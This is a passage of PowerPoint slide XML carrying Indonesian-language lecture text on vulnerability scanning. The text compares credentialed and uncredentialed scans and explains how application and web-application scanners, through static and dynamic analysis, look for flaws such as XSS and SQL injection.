              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404733527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Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> statis (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tervalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall yang salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs (XSS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
